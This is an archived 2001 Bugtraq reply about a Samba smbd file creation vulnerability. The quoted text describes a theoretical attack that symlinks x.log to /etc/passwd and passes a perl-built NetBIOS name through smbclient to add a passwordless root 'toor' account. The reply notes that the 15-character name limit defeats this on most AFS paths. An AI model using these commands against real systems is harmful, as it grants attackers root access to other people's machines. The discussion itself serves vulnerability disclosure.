[21318] in bugtraq
Re: smbd remote file creation vulnerability
daemon@ATHENA.MIT.EDU (Daniel Jacobowitz)
Tue Jul 3 13:18:48 2001
Date: Mon, 2 Jul 2001 14:30:41 -0700
From: Daniel Jacobowitz <dmj+@andrew.cmu.edu>
To: Christopher William Palow <cwp@andrew.cmu.edu>
Cc: bugtraq@securityfocus.com
Message-ID: <20010702143041.A798@nevyn.them.org>
Mail-Followup-To: Christopher William Palow <cwp@andrew.cmu.edu>,
bugtraq@securityfocus.com
Mime-Version: 1.0
Content-Type: text/plain; charset=us-ascii
Content-Disposition: inline
In-Reply-To: <Pine.LNX.4.21L-021.0107021108330.1654-100000@unix45.andrew.cmu.edu>; from cwp@andrew.cmu.edu on Mon, Jul 02, 2001 at 11:15:29AM -0400
On Mon, Jul 02, 2001 at 11:15:29AM -0400, Christopher William Palow wrote:
> I was hoping to test this out but haven't been able to so here goes on
> theoretical...
>
> How to make this exploit a remote one using AFS or other remote file
> systems.
>
> What does this exploit need on the remote side?? A
> symlink; soo... on a AFS system ,preferably one of a well known node that
> most AFS servers would have in their CellServDB such as
> andrew.cmu.edu or athena.mit.edu, create a symlink to /etc/passwd named
> x.log like
>
> ln -s /etc/passwd /afs/andrew.cmu.edu/usr/<username>/x.log
>
> now make the symlink world readable... then all you need is UNIXes running
> samba in the vulnerable configuration and running AFS.
>
> smbclient //afs.machine/"`perl -e '{print "\ntoor::0:0::/:/bin/sh\n"}'`" \
> -n ../../../afs/andrew.cmu.edu/usr/<username>/x -N
> telnet afs.machine
> login as toor
>
> if root logins aren't allowed make a dummy account first, login with that
> then make a toor account ontop of that and su over to toor.
Remember, the log path must be within 15 characters to fit in a netbios
name! You're not going to get anywhere on andrew, or most other AFS
paths, with that restriction.
--
Daniel Jacobowitz Carnegie Mellon University
MontaVista Software Debian GNU/Linux Developer
